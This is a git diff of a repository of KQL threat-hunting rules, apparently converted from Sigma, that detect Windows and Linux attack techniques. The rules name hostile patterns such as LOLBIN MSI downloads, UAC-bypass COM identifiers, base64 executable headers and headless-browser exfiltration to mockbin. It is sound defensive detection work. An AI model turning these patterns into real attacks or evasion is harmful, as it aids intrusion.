+DeviceImageLoadEvents | where (FolderPath endswith "\\coreclr.dll" or FolderPath endswith "\\facesdk.dll" or FolderPath endswith "\\HPCustPartUI.dll" or FolderPath endswith "\\libcef.dll" or FolderPath endswith "\\ZIPDLL.dll") and ((FolderPath contains ":\\Perflogs\\" or FolderPath contains ":\\Users\\Public\\" or FolderPath contains "\\Temporary Internet" or FolderPath contains "\\Windows\\Temp\\") or ((FolderPath contains ":\\Users\\" and FolderPath contains "\\Favorites\\") or (FolderPath contains ":\\Users\\" and FolderPath contains "\\Favourites\\") or (FolderPath contains ":\\Users\\" and FolderPath contains "\\Contacts\\") or (FolderPath contains ":\\Users\\" and FolderPath contains "\\Pictures\\"))) \ No newline at end of file diff --git a/KQL/rules/Execution/add_windows_capability_via_powershell_cmdlet.kql b/KQL/rules/Execution/add_windows_capability_via_powershell_cmdlet.kql index 256d0222..282b4570 100644 --- a/KQL/rules/Execution/add_windows_capability_via_powershell_cmdlet.kql +++ b/KQL/rules/Execution/add_windows_capability_via_powershell_cmdlet.kql @@ -1,12 +1,12 @@ -// Title: Add Windows Capability Via PowerShell Cmdlet -// Author: Nasreddine Bencherchali (Nextron Systems) -// Date: 2023-01-22 -// Level: medium -// Description: Detects usage of the "Add-WindowsCapability" cmdlet to add Windows capabilities. Notable capabilities could be "OpenSSH" and others. -// MITRE Tactic: Execution -// Tags: attack.execution -// False Positives: -// - Legitimate usage of the capabilities by administrators or users. Add additional filters accordingly. - -DeviceProcessEvents +// Title: Add Windows Capability Via PowerShell Cmdlet +// Author: Nasreddine Bencherchali (Nextron Systems) +// Date: 2023-01-22 +// Level: medium +// Description: Detects usage of the "Add-WindowsCapability" cmdlet to add Windows capabilities. Notable capabilities could be "OpenSSH" and others. +// MITRE Tactic: Execution +// Tags: attack.execution +// False Positives: +// - Legitimate usage of the capabilities by administrators or users. Add additional filters accordingly. + +DeviceProcessEvents | where ProcessCommandLine contains "OpenSSH." and ProcessCommandLine contains "Add-WindowsCapability" and ((FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\pwsh.exe") or (ProcessVersionInfoOriginalFileName in~ ("PowerShell.EXE", "pwsh.dll"))) \ No newline at end of file diff --git a/KQL/rules/Execution/adwind_rat_jrat_file_artifact.kql b/KQL/rules/Execution/adwind_rat_jrat_file_artifact.kql index cbcf3626..251fea5d 100644 --- a/KQL/rules/Execution/adwind_rat_jrat_file_artifact.kql +++ b/KQL/rules/Execution/adwind_rat_jrat_file_artifact.kql @@ -1,10 +1,10 @@ -// Title: Adwind RAT / JRAT File Artifact -// Author: Florian Roth (Nextron Systems), Tom Ueltschi, Jonhnathan Ribeiro, oscd.community -// Date: 2017-11-10 -// Level: high -// Description: Detects javaw.exe in AppData folder as used by Adwind / JRAT -// MITRE Tactic: Execution -// Tags: attack.execution, attack.t1059.005, attack.t1059.007 - -DeviceFileEvents +// Title: Adwind RAT / JRAT File Artifact +// Author: Florian Roth (Nextron Systems), Tom Ueltschi, Jonhnathan Ribeiro, oscd.community +// Date: 2017-11-10 +// Level: high +// Description: Detects javaw.exe in AppData folder as used by Adwind / JRAT +// MITRE Tactic: Execution +// Tags: attack.execution, attack.t1059.005, attack.t1059.007 + +DeviceFileEvents | where (FolderPath contains "\\AppData\\Roaming\\Oracle\\bin\\java" and FolderPath contains ".exe") or (FolderPath contains "\\Retrive" and FolderPath contains ".vbs") \ No newline at end of file diff --git a/KQL/rules/Execution/application_removed_via_wmic_exe.kql b/KQL/rules/Execution/application_removed_via_wmic_exe.kql index edd5d8c9..c7b87fa2 100644 --- a/KQL/rules/Execution/application_removed_via_wmic_exe.kql +++ b/KQL/rules/Execution/application_removed_via_wmic_exe.kql @@ -1,10 +1,10 @@ -// Title: Application Removed Via Wmic.EXE -// Author: frack113 -// Date: 2022-01-28 -// Level: medium -// Description: Detects the removal or uninstallation of an application via "Wmic.EXE". -// MITRE Tactic: Execution -// Tags: attack.execution, attack.t1047 - -DeviceProcessEvents +// Title: Application Removed Via Wmic.EXE +// Author: frack113 +// Date: 2022-01-28 +// Level: medium +// Description: Detects the removal or uninstallation of an application via "Wmic.EXE". +// MITRE Tactic: Execution +// Tags: attack.execution, attack.t1047 + +DeviceProcessEvents | where (ProcessCommandLine contains "call" and ProcessCommandLine contains "uninstall") and (FolderPath endswith "\\WMIC.exe" or ProcessVersionInfoOriginalFileName =~ "wmic.exe") \ No newline at end of file diff --git a/KQL/rules/Execution/application_terminated_via_wmic_exe.kql b/KQL/rules/Execution/application_terminated_via_wmic_exe.kql index 4fdd3ae8..331de52b 100644 --- a/KQL/rules/Execution/application_terminated_via_wmic_exe.kql +++ b/KQL/rules/Execution/application_terminated_via_wmic_exe.kql @@ -1,10 +1,10 @@ -// Title: Application Terminated Via Wmic.EXE -// Author: Nasreddine Bencherchali (Nextron Systems) -// Date: 2023-09-11 -// Level: medium -// Description: Detects calls to the "terminate" function via wmic in order to kill an application -// MITRE Tactic: Execution -// Tags: attack.execution, attack.t1047 - -DeviceProcessEvents +// Title: Application Terminated Via Wmic.EXE +// Author: Nasreddine Bencherchali (Nextron Systems) +// Date: 2023-09-11 +// Level: medium +// Description: Detects calls to the "terminate" function via wmic in order to kill an application +// MITRE Tactic: Execution +// Tags: attack.execution, attack.t1047 + +DeviceProcessEvents | where (ProcessCommandLine contains "call" and ProcessCommandLine contains "terminate") and (FolderPath endswith "\\WMIC.exe" or ProcessVersionInfoOriginalFileName =~ "wmic.exe") \ No newline at end of file diff --git a/KQL/rules/Execution/arbitrary_binary_execution_using_gup_utility.kql b/KQL/rules/Execution/arbitrary_binary_execution_using_gup_utility.kql index da6e5306..a81e8577 100644 --- a/KQL/rules/Execution/arbitrary_binary_execution_using_gup_utility.kql +++ b/KQL/rules/Execution/arbitrary_binary_execution_using_gup_utility.kql @@ -1,12 +1,12 @@ -// Title: Arbitrary Binary Execution Using GUP Utility -// Author: Nasreddine Bencherchali (Nextron Systems) -// Date: 2022-06-10 -// Level: medium -// Description: Detects execution of the Notepad++ updater (gup) to launch other commands or executables -// MITRE Tactic: Execution -// Tags: attack.execution -// False Positives: -// - Other parent binaries using GUP not currently identified - -DeviceProcessEvents +// Title: Arbitrary Binary Execution Using GUP Utility +// Author: Nasreddine Bencherchali (Nextron Systems) +// Date: 2022-06-10 +// Level: medium +// Description: Detects execution of the Notepad++ updater (gup) to launch other commands or executables +// MITRE Tactic: Execution +// Tags: attack.execution +// False Positives: +// - Other parent binaries using GUP not currently identified + +DeviceProcessEvents | where (FolderPath endswith "\\explorer.exe" and InitiatingProcessFolderPath endswith "\\gup.exe") and (not(((ProcessCommandLine contains "\\Notepad++\\notepad++.exe" and FolderPath endswith "\\explorer.exe") or isnull(ProcessCommandLine) or InitiatingProcessFolderPath contains "\\Notepad++\\updater\\"))) \ No newline at end of file diff --git a/KQL/rules/Execution/arbitrary_msi_download_via_devinit_exe.kql b/KQL/rules/Execution/arbitrary_msi_download_via_devinit_exe.kql index dbd9319e..2343874d 100644 --- a/KQL/rules/Execution/arbitrary_msi_download_via_devinit_exe.kql +++ b/KQL/rules/Execution/arbitrary_msi_download_via_devinit_exe.kql @@ -1,10 +1,10 @@ -// Title: Arbitrary MSI Download Via Devinit.EXE -// Author: Florian Roth (Nextron Systems) -// Date: 2022-01-11 -// Level: medium -// Description: Detects a certain command line flag combination used by "devinit.exe", which can be abused as a LOLBIN to download arbitrary MSI packages on a Windows system -// MITRE Tactic: Execution -// Tags: attack.execution, attack.defense-evasion, attack.t1218 - -DeviceProcessEvents +// Title: Arbitrary MSI Download Via Devinit.EXE +// Author: Florian Roth (Nextron Systems) +// Date: 2022-01-11 +// Level: medium +// Description: Detects a certain command line flag combination used by "devinit.exe", which can be abused as a LOLBIN to download arbitrary MSI packages on a Windows system +// MITRE Tactic: Execution +// Tags: attack.execution, attack.defense-evasion, attack.t1218 + +DeviceProcessEvents | where ProcessCommandLine contains " -t msi-install " and ProcessCommandLine contains " -i http" \ No newline at end of file diff --git a/KQL/rules/Execution/arbitrary_shell_command_execution_via_settingcontent_ms.kql b/KQL/rules/Execution/arbitrary_shell_command_execution_via_settingcontent_ms.kql index 48bb255a..785b6fc6 100644 --- a/KQL/rules/Execution/arbitrary_shell_command_execution_via_settingcontent_ms.kql +++ b/KQL/rules/Execution/arbitrary_shell_command_execution_via_settingcontent_ms.kql @@ -1,10 +1,10 @@ -// Title: Arbitrary Shell Command Execution Via Settingcontent-Ms -// Author: Sreeman -// Date: 2020-03-13 -// Level: medium -// Description: The .SettingContent-ms file type was introduced in Windows 10 and allows a user to create "shortcuts" to various Windows 10 setting pages. These files are simply XML and contain paths to various Windows 10 settings binaries. -// MITRE Tactic: Execution -// Tags: attack.t1204, attack.t1566.001, attack.execution, attack.initial-access - -DeviceProcessEvents +// Title: Arbitrary Shell Command Execution Via Settingcontent-Ms +// Author: Sreeman +// Date: 2020-03-13 +// Level: medium +// Description: The .SettingContent-ms file type was introduced in Windows 10 and allows a user to create "shortcuts" to various Windows 10 setting pages. These files are simply XML and contain paths to various Windows 10 settings binaries. +// MITRE Tactic: Execution +// Tags: attack.t1204, attack.t1566.001, attack.execution, attack.initial-access + +DeviceProcessEvents | where ProcessCommandLine contains ".SettingContent-ms" and (not(ProcessCommandLine contains "immersivecontrolpanel")) \ No newline at end of file diff --git a/KQL/rules/Execution/assembly_dll_creation_via_aspnetcompiler.kql b/KQL/rules/Execution/assembly_dll_creation_via_aspnetcompiler.kql index 5dae167d..45ac03b2 100644 --- a/KQL/rules/Execution/assembly_dll_creation_via_aspnetcompiler.kql +++ b/KQL/rules/Execution/assembly_dll_creation_via_aspnetcompiler.kql @@ -1,12 +1,12 @@ -// Title: Assembly DLL Creation Via AspNetCompiler -// Author: Nasreddine Bencherchali (Nextron Systems) -// Date: 2023-08-14 -// Level: medium -// Description: Detects the creation of new DLL assembly files by "aspnet_compiler.exe", which could be a sign of "aspnet_compiler" abuse to proxy execution through a build provider. -// MITRE Tactic: Execution -// Tags: attack.execution -// False Positives: -// - Legitimate assembly compilation using a build provider - -DeviceFileEvents +// Title: Assembly DLL Creation Via AspNetCompiler +// Author: Nasreddine Bencherchali (Nextron Systems) +// Date: 2023-08-14 +// Level: medium +// Description: Detects the creation of new DLL assembly files by "aspnet_compiler.exe", which could be a sign of "aspnet_compiler" abuse to proxy execution through a build provider. +// MITRE Tactic: Execution +// Tags: attack.execution +// False Positives: +// - Legitimate assembly compilation using a build provider + +DeviceFileEvents | where InitiatingProcessFolderPath endswith "\\aspnet_compiler.exe" and (FolderPath contains "\\Temporary ASP.NET Files\\" and FolderPath contains "\\assembly\\tmp\\" and FolderPath contains ".dll") \ No newline at end of file diff --git a/KQL/rules/Execution/base64_mz_header_in_commandline.kql b/KQL/rules/Execution/base64_mz_header_in_commandline.kql index deff3393..cb703139 100644 --- a/KQL/rules/Execution/base64_mz_header_in_commandline.kql +++ b/KQL/rules/Execution/base64_mz_header_in_commandline.kql @@ -1,12 +1,12 @@ -// Title: Base64 MZ Header In CommandLine -// Author: Nasreddine Bencherchali (Nextron Systems) -// Date: 2022-07-12 -// Level: high -// Description: Detects encoded base64 MZ header in the commandline -// MITRE Tactic: Execution -// Tags: attack.execution -// False Positives: -// - Unlikely - -DeviceProcessEvents +// Title: Base64 MZ Header In CommandLine +// Author: Nasreddine Bencherchali (Nextron Systems) +// Date: 2022-07-12 +// Level: high +// Description: Detects encoded base64 MZ header in the commandline +// MITRE Tactic: Execution +// Tags: attack.execution +// False Positives: +// - Unlikely + +DeviceProcessEvents | where ProcessCommandLine contains "TVqQAAMAAAAEAAAA" or ProcessCommandLine contains "TVpQAAIAAAAEAA8A" or ProcessCommandLine contains "TVqAAAEAAAAEABAA" or ProcessCommandLine contains "TVoAAAAAAAAAAAAA" or ProcessCommandLine contains "TVpTAQEAAAAEAAAA" \ No newline at end of file diff --git a/KQL/rules/Execution/bash_interactive_shell.kql b/KQL/rules/Execution/bash_interactive_shell.kql index 0d0ba1f4..48f6a90f 100644 --- a/KQL/rules/Execution/bash_interactive_shell.kql +++ b/KQL/rules/Execution/bash_interactive_shell.kql @@ -1,10 +1,10 @@ -// Title: Bash Interactive Shell -// Author: @d4ns4n_ -// Date: 2023-04-07 -// Level: low -// Description: Detects execution of the bash shell with the interactive flag "-i". -// MITRE Tactic: Execution -// Tags: attack.execution - -DeviceProcessEvents +// Title: Bash Interactive Shell +// Author: @d4ns4n_ +// Date: 2023-04-07 +// Level: low +// Description: Detects execution of the bash shell with the interactive flag "-i". +// MITRE Tactic: Execution +// Tags: attack.execution + +DeviceProcessEvents | where ProcessCommandLine contains " -i " and FolderPath endswith "/bash" \ No newline at end of file diff --git a/KQL/rules/Execution/binary_proxy_execution_via_dotnet_trace_exe.kql b/KQL/rules/Execution/binary_proxy_execution_via_dotnet_trace_exe.kql index 4b800d52..e40790aa 100644 --- a/KQL/rules/Execution/binary_proxy_execution_via_dotnet_trace_exe.kql +++ b/KQL/rules/Execution/binary_proxy_execution_via_dotnet_trace_exe.kql @@ -1,12 +1,12 @@ -// Title: Binary Proxy Execution Via Dotnet-Trace.EXE -// Author: Jimmy Bayne (@bohops) -// Date: 2024-01-02 -// Level: medium -// Description: Detects commandline arguments for executing a child process via dotnet-trace.exe -// MITRE Tactic: Execution -// Tags: attack.execution, attack.defense-evasion, attack.t1218 -// False Positives: -// - Legitimate usage of the utility in order to debug and trace a program. - -DeviceProcessEvents +// Title: Binary Proxy Execution Via Dotnet-Trace.EXE +// Author: Jimmy Bayne (@bohops) +// Date: 2024-01-02 +// Level: medium +// Description: Detects commandline arguments for executing a child process via dotnet-trace.exe +// MITRE Tactic: Execution +// Tags: attack.execution, attack.defense-evasion, attack.t1218 +// False Positives: +// - Legitimate usage of the utility in order to debug and trace a program. + +DeviceProcessEvents | where (ProcessCommandLine contains "-- " and ProcessCommandLine contains "collect") and (FolderPath endswith "\\dotnet-trace.exe" or ProcessVersionInfoOriginalFileName =~ "dotnet-trace.dll") \ No newline at end of file diff --git a/KQL/rules/Execution/bpftrace_unsafe_option_usage.kql b/KQL/rules/Execution/bpftrace_unsafe_option_usage.kql index 94cd4f50..c7b1deda 100644 --- a/KQL/rules/Execution/bpftrace_unsafe_option_usage.kql +++ b/KQL/rules/Execution/bpftrace_unsafe_option_usage.kql @@ -1,12 +1,12 @@ -// Title: BPFtrace Unsafe Option Usage -// Author: Andreas Hunkeler (@Karneades) -// Date: 2022-02-11 -// Level: medium -// Description: Detects the usage of the unsafe bpftrace option -// MITRE Tactic: Execution -// Tags: attack.execution, attack.t1059.004 -// False Positives: -// - Legitimate usage of the unsafe option - -DeviceProcessEvents +// Title: BPFtrace Unsafe Option Usage +// Author: Andreas Hunkeler (@Karneades) +// Date: 2022-02-11 +// Level: medium +// Description: Detects the usage of the unsafe bpftrace option +// MITRE Tactic: Execution +// Tags: attack.execution, attack.t1059.004 +// False Positives: +// - Legitimate usage of the unsafe option + +DeviceProcessEvents | where ProcessCommandLine contains "--unsafe" and FolderPath endswith "bpftrace" \ No newline at end of file diff --git a/KQL/rules/Execution/cab_file_extraction_via_wusa_exe_from_potentially_suspicious_paths.kql b/KQL/rules/Execution/cab_file_extraction_via_wusa_exe_from_potentially_suspicious_paths.kql index cc1de169..9c770818 100644 --- a/KQL/rules/Execution/cab_file_extraction_via_wusa_exe_from_potentially_suspicious_paths.kql +++ b/KQL/rules/Execution/cab_file_extraction_via_wusa_exe_from_potentially_suspicious_paths.kql @@ -1,10 +1,10 @@ -// Title: Cab File Extraction Via Wusa.EXE From Potentially Suspicious Paths -// Author: Nasreddine Bencherchali (Nextron Systems) -// Date: 2022-08-05 -// Level: high -// Description: Detects the execution of the "wusa.exe" (Windows Update Standalone Installer) utility to extract ".cab" files using the "/extract" argument from potentially suspicious paths. -// MITRE Tactic: Execution -// Tags: attack.execution - -DeviceProcessEvents +// Title: Cab File Extraction Via Wusa.EXE From Potentially Suspicious Paths +// Author: Nasreddine Bencherchali (Nextron Systems) +// Date: 2022-08-05 +// Level: high +// Description: Detects the execution of the "wusa.exe" (Windows Update Standalone Installer) utility to extract ".cab" files using the "/extract" argument from potentially suspicious paths. +// MITRE Tactic: Execution +// Tags: attack.execution + +DeviceProcessEvents | where (ProcessCommandLine contains ":\\PerfLogs\\" or ProcessCommandLine contains ":\\Users\\Public\\" or ProcessCommandLine contains ":\\Windows\\Temp\\" or ProcessCommandLine contains "\\Appdata\\Local\\Temp\\") and (ProcessCommandLine contains "/extract:" and FolderPath endswith "\\wusa.exe") \ No newline at end of file diff --git a/KQL/rules/Execution/capsh_shell_invocation_linux.kql b/KQL/rules/Execution/capsh_shell_invocation_linux.kql index 57c666f5..9dff2a13 100644 --- a/KQL/rules/Execution/capsh_shell_invocation_linux.kql +++ b/KQL/rules/Execution/capsh_shell_invocation_linux.kql @@ -1,10 +1,10 @@ -// Title: Capsh Shell Invocation - Linux -// Author: Li Ling, Andy Parkidomo, Robert Rakowski, Blake Hartstein (Bloomberg L.P.) -// Date: 2024-09-02 -// Level: high -// Description: Detects the use of the "capsh" utility to invoke a shell. -// MITRE Tactic: Execution -// Tags: attack.execution, attack.t1059 - -DeviceProcessEvents +// Title: Capsh Shell Invocation - Linux +// Author: Li Ling, Andy Parkidomo, Robert Rakowski, Blake Hartstein (Bloomberg L.P.) +// Date: 2024-09-02 +// Level: high +// Description: Detects the use of the "capsh" utility to invoke a shell. +// MITRE Tactic: Execution +// Tags: attack.execution, attack.t1059 + +DeviceProcessEvents | where ProcessCommandLine endswith " --" and FolderPath endswith "/capsh" \ No newline at end of file diff --git a/KQL/rules/Execution/change_powershell_policies_to_an_insecure_level.kql b/KQL/rules/Execution/change_powershell_policies_to_an_insecure_level.kql index 59879370..2e574132 100644 --- a/KQL/rules/Execution/change_powershell_policies_to_an_insecure_level.kql +++ b/KQL/rules/Execution/change_powershell_policies_to_an_insecure_level.kql @@ -1,12 +1,12 @@ -// Title: Change PowerShell Policies to an Insecure Level -// Author: frack113 -// Date: 2021-11-01 -// Level: medium -// Description: Detects changing the PowerShell script execution policy to a potentially insecure level using the "-ExecutionPolicy" flag. -// MITRE Tactic: Execution -// Tags: attack.execution, attack.t1059.001 -// False Positives: -// - Administrator scripts - -DeviceProcessEvents +// Title: Change PowerShell Policies to an Insecure Level +// Author: frack113 +// Date: 2021-11-01 +// Level: medium +// Description: Detects changing the PowerShell script execution policy to a potentially insecure level using the "-ExecutionPolicy" flag. +// MITRE Tactic: Execution +// Tags: attack.execution, attack.t1059.001 +// False Positives: +// - Administrator scripts + +DeviceProcessEvents | where (((ProcessVersionInfoOriginalFileName in~ ("powershell_ise.exe", "PowerShell.EXE", "pwsh.dll")) or (FolderPath endswith "\\powershell_ise.exe" or FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\pwsh.exe")) and (ProcessCommandLine contains "Bypass" or ProcessCommandLine contains "Unrestricted") and (ProcessCommandLine contains "-executionpolicy " or ProcessCommandLine contains " -ep " or ProcessCommandLine contains " -exec ")) and (not(((ProcessCommandLine contains "-NoProfile -ExecutionPolicy Bypass -File \"C:\\Program Files\\PowerShell\\7\\" or ProcessCommandLine contains "-NoProfile -ExecutionPolicy Bypass -File \"C:\\Program Files (x86)\\PowerShell\\7\\") and (InitiatingProcessFolderPath in~ ("C:\\Windows\\SysWOW64\\msiexec.exe", "C:\\Windows\\System32\\msiexec.exe"))))) and (not(((ProcessCommandLine contains "-ExecutionPolicy ByPass -File \"C:\\Program Files\\Avast Software\\Avast" or ProcessCommandLine contains "-ExecutionPolicy ByPass -File \"C:\\Program Files (x86)\\Avast Software\\Avast\\") and (InitiatingProcessFolderPath contains "C:\\Program Files\\Avast Software\\Avast\\" or InitiatingProcessFolderPath contains "C:\\Program Files (x86)\\Avast Software\\Avast\\" or InitiatingProcessFolderPath contains "\\instup.exe")))) \ No newline at end of file diff --git a/KQL/rules/Execution/chromium_browser_headless_execution_to_mockbin_like_site.kql b/KQL/rules/Execution/chromium_browser_headless_execution_to_mockbin_like_site.kql index b69a82b1..6d2ad8c8 100644 --- a/KQL/rules/Execution/chromium_browser_headless_execution_to_mockbin_like_site.kql +++ b/KQL/rules/Execution/chromium_browser_headless_execution_to_mockbin_like_site.kql @@ -1,10 +1,10 @@ -// Title: Chromium Browser Headless Execution To Mockbin Like Site -// Author: X__Junior (Nextron Systems) -// Date: 2023-09-11 -// Level: high -// Description: Detects the execution of a Chromium based browser process with the "headless" flag and a URL pointing to the mockbin.org service (which can be used to exfiltrate data). -// MITRE Tactic: Execution -// Tags: attack.execution - -DeviceProcessEvents +// Title: Chromium Browser Headless Execution To Mockbin Like Site +// Author: X__Junior (Nextron Systems) +// Date: 2023-09-11 +// Level: high +// Description: Detects the execution of a Chromium based browser process with the "headless" flag and a URL pointing to the mockbin.org service (which can be used to exfiltrate data). +// MITRE Tactic: Execution +// Tags: attack.execution + +DeviceProcessEvents | where ProcessCommandLine contains "--headless" and (FolderPath endswith "\\brave.exe" or FolderPath endswith "\\chrome.exe" or FolderPath endswith "\\msedge.exe" or FolderPath endswith "\\opera.exe" or FolderPath endswith "\\vivaldi.exe") and (ProcessCommandLine contains "://run.mocky" or ProcessCommandLine contains "://mockbin") \ No newline at end of file diff --git a/KQL/rules/Execution/clfs_sys_loaded_by_process_located_in_a_potential_suspicious_location.kql b/KQL/rules/Execution/clfs_sys_loaded_by_process_located_in_a_potential_suspicious_location.kql index 60294be8..8f3be24d 100644 --- a/KQL/rules/Execution/clfs_sys_loaded_by_process_located_in_a_potential_suspicious_location.kql +++ b/KQL/rules/Execution/clfs_sys_loaded_by_process_located_in_a_potential_suspicious_location.kql @@ -1,10 +1,10 @@ -// Title: Clfs.SYS Loaded By Process Located In a Potential Suspicious Location -// Author: X__Junior -// Date: 2025-01-20 -// Level: medium -// Description: Detects Clfs.sys being loaded by a process running from a potentially suspicious location. Clfs.sys is loaded as part of many CVEs exploits that targets Common Log File. -// MITRE Tactic: Execution -// Tags: attack.execution, attack.t1059 - -DeviceImageLoadEvents +// Title: Clfs.SYS Loaded By Process Located In a Potential Suspicious Location +// Author: X__Junior +// Date: 2025-01-20 +// Level: medium +// Description: Detects Clfs.sys being loaded by a process running from a potentially suspicious location. Clfs.sys is loaded as part of many CVEs exploits that targets Common Log File. +// MITRE Tactic: Execution +// Tags: attack.execution, attack.t1059 + +DeviceImageLoadEvents | where FolderPath endswith "\\clfs.sys" and ((InitiatingProcessFolderPath contains ":\\Perflogs\\" or InitiatingProcessFolderPath contains ":\\Users\\Public\\" or InitiatingProcessFolderPath contains "\\Temporary Internet" or InitiatingProcessFolderPath contains "\\Windows\\Temp\\") or ((InitiatingProcessFolderPath contains ":\\Users\\" and InitiatingProcessFolderPath contains "\\Favorites\\") or (InitiatingProcessFolderPath contains ":\\Users\\" and InitiatingProcessFolderPath contains "\\Favourites\\") or (InitiatingProcessFolderPath contains ":\\Users\\" and InitiatingProcessFolderPath contains "\\Contacts\\") or (InitiatingProcessFolderPath contains ":\\Users\\" and InitiatingProcessFolderPath contains "\\Pictures\\"))) \ No newline at end of file diff --git a/KQL/rules/Execution/clr_dll_loaded_via_office_applications.kql b/KQL/rules/Execution/clr_dll_loaded_via_office_applications.kql index a592813f..8168f9fc 100644 --- a/KQL/rules/Execution/clr_dll_loaded_via_office_applications.kql +++ b/KQL/rules/Execution/clr_dll_loaded_via_office_applications.kql @@ -1,10 +1,10 @@ -// Title: CLR DLL Loaded Via Office Applications -// Author: Antonlovesdnb -// Date: 2020-02-19 -// Level: medium -// Description: Detects CLR DLL being loaded by an Office Product -// MITRE Tactic: Execution -// Tags: attack.execution, attack.t1204.002 - -DeviceImageLoadEvents +// Title: CLR DLL Loaded Via Office Applications +// Author: Antonlovesdnb +// Date: 2020-02-19 +// Level: medium +// Description: Detects CLR DLL being loaded by an Office Product +// MITRE Tactic: Execution +// Tags: attack.execution, attack.t1204.002 + +DeviceImageLoadEvents | where FolderPath contains "\\clr.dll" and (InitiatingProcessFolderPath endswith "\\excel.exe" or InitiatingProcessFolderPath endswith "\\mspub.exe" or InitiatingProcessFolderPath endswith "\\outlook.exe" or InitiatingProcessFolderPath endswith "\\onenote.exe" or InitiatingProcessFolderPath endswith "\\onenoteim.exe" or InitiatingProcessFolderPath endswith "\\powerpnt.exe" or InitiatingProcessFolderPath endswith "\\winword.exe") \ No newline at end of file diff --git a/KQL/rules/Execution/cmd_exe_missing_space_characters_execution_anomaly.kql b/KQL/rules/Execution/cmd_exe_missing_space_characters_execution_anomaly.kql index 543d04a8..98de6b57 100644 --- a/KQL/rules/Execution/cmd_exe_missing_space_characters_execution_anomaly.kql +++ b/KQL/rules/Execution/cmd_exe_missing_space_characters_execution_anomaly.kql @@ -1,11 +1,11 @@ -// Title: Cmd.EXE Missing Space Characters Execution Anomaly -// Author: Florian Roth (Nextron Systems) -// Date: 2022-08-23 -// Level: high -// Description: Detects Windows command lines that miss a space before or after the /c flag when running a command using the cmd.exe. -// This could be a sign of obfuscation of a fat finger problem (typo by the developer). -// MITRE Tactic: Execution -// Tags: attack.execution, attack.t1059.001 - -DeviceProcessEvents +// Title: Cmd.EXE Missing Space Characters Execution Anomaly +// Author: Florian Roth (Nextron Systems) +// Date: 2022-08-23 +// Level: high +// Description: Detects Windows command lines that miss a space before or after the /c flag when running a command using the cmd.exe. +// This could be a sign of obfuscation of a fat finger problem (typo by the developer). +// MITRE Tactic: Execution +// Tags: attack.execution, attack.t1059.001 + +DeviceProcessEvents | where ((ProcessCommandLine contains "cmd.exe/c" or ProcessCommandLine contains "\\cmd/c" or ProcessCommandLine contains "\"cmd/c" or ProcessCommandLine contains "cmd.exe/k" or ProcessCommandLine contains "\\cmd/k" or ProcessCommandLine contains "\"cmd/k" or ProcessCommandLine contains "cmd.exe/r" or ProcessCommandLine contains "\\cmd/r" or ProcessCommandLine contains "\"cmd/r") or (ProcessCommandLine contains "/cwhoami" or ProcessCommandLine contains "/cpowershell" or ProcessCommandLine contains "/cschtasks" or ProcessCommandLine contains "/cbitsadmin" or ProcessCommandLine contains "/ccertutil" or ProcessCommandLine contains "/kwhoami" or ProcessCommandLine contains "/kpowershell" or ProcessCommandLine contains "/kschtasks" or ProcessCommandLine contains "/kbitsadmin" or ProcessCommandLine contains "/kcertutil") or (ProcessCommandLine contains "cmd.exe /c" or ProcessCommandLine contains "cmd /c" or ProcessCommandLine contains "cmd.exe /k" or ProcessCommandLine contains "cmd /k" or ProcessCommandLine contains "cmd.exe /r" or ProcessCommandLine contains "cmd /r")) and (not(((ProcessCommandLine in~ ("cmd.exe /c") or ProcessCommandLine contains "AppData\\Local\\Programs\\Microsoft VS Code\\resources\\app\\node_modules" or ProcessCommandLine endswith "cmd.exe/c .") or (ProcessCommandLine contains "cmd.exe /c " or ProcessCommandLine contains "cmd /c " or ProcessCommandLine contains "cmd.exe /k " or ProcessCommandLine contains "cmd /k " or ProcessCommandLine contains "cmd.exe /r " or ProcessCommandLine contains "cmd /r ")))) \ No newline at end of file diff --git a/KQL/rules/Execution/cmstp_uac_bypass_via_com_object_access.kql b/KQL/rules/Execution/cmstp_uac_bypass_via_com_object_access.kql index 5f2d0335..4747747d 100644 --- a/KQL/rules/Execution/cmstp_uac_bypass_via_com_object_access.kql +++ b/KQL/rules/Execution/cmstp_uac_bypass_via_com_object_access.kql @@ -1,12 +1,12 @@ -// Title: CMSTP UAC Bypass via COM Object Access -// Author: Nik Seetharaman, Christian Burkard (Nextron Systems) -// Date: 2019-07-31 -// Level: high -// Description: Detects UAC Bypass Attempt Using Microsoft Connection Manager Profile Installer Autoelevate-capable COM Objects (e.g. UACMe ID of 41, 43, 58 or 65) -// MITRE Tactic: Execution -// Tags: attack.execution, attack.defense-evasion, attack.privilege-escalation, attack.t1548.002, attack.t1218.003, attack.g0069, car.2019-04-001 -// False Positives: -// - Legitimate CMSTP use (unlikely in modern enterprise environments) - -DeviceProcessEvents +// Title: CMSTP UAC Bypass via COM Object Access +// Author: Nik Seetharaman, Christian Burkard (Nextron Systems) +// Date: 2019-07-31 +// Level: high +// Description: Detects UAC Bypass Attempt Using Microsoft Connection Manager Profile Installer Autoelevate-capable COM Objects (e.g. UACMe ID of 41, 43, 58 or 65) +// MITRE Tactic: Execution +// Tags: attack.execution, attack.defense-evasion, attack.privilege-escalation, attack.t1548.002, attack.t1218.003, attack.g0069, car.2019-04-001 +// False Positives: +// - Legitimate CMSTP use (unlikely in modern enterprise environments) + +DeviceProcessEvents | where (ProcessIntegrityLevel in~ ("High", "System", "S-1-16-16384", "S-1-16-12288")) and (InitiatingProcessCommandLine contains " /Processid:{3E5FC7F9-9A51-4367-9063-A120244FBEC7}" or InitiatingProcessCommandLine contains " /Processid:{3E000D72-A845-4CD9-BD83-80C07C3B881F}" or InitiatingProcessCommandLine contains " /Processid:{BD54C901-076B-434E-B6C7-17C531F4AB41}" or InitiatingProcessCommandLine contains " /Processid:{D2E7041B-2927-42FB-8E9F-7CE93B6DC937}" or InitiatingProcessCommandLine contains " /Processid:{E9495B87-D950-4AB5-87A5-FF6D70BF3E90}") and InitiatingProcessFolderPath endswith "\\DllHost.exe" \ No newline at end of file diff --git a/KQL/rules/Execution/command_line_execution_with_suspicious_url_and_appdata_strings.kql b/KQL/rules/Execution/command_line_execution_with_suspicious_url_and_appdata_strings.kql index dbf199d3..336fc214 100644 --- a/KQL/rules/Execution/command_line_execution_with_suspicious_url_and_appdata_strings.kql +++ b/KQL/rules/Execution/command_line_execution_with_suspicious_url_and_appdata_strings.kql @@ -1,12 +1,12 @@ -// Title: Command Line Execution with Suspicious URL and AppData Strings -// Author: Florian Roth (Nextron Systems), Jonhnathan Ribeiro, oscd.community -// Date: 2019-01-16 -// Level: medium -// Description: Detects a suspicious command line execution that includes an URL and AppData string in the command line parameters as 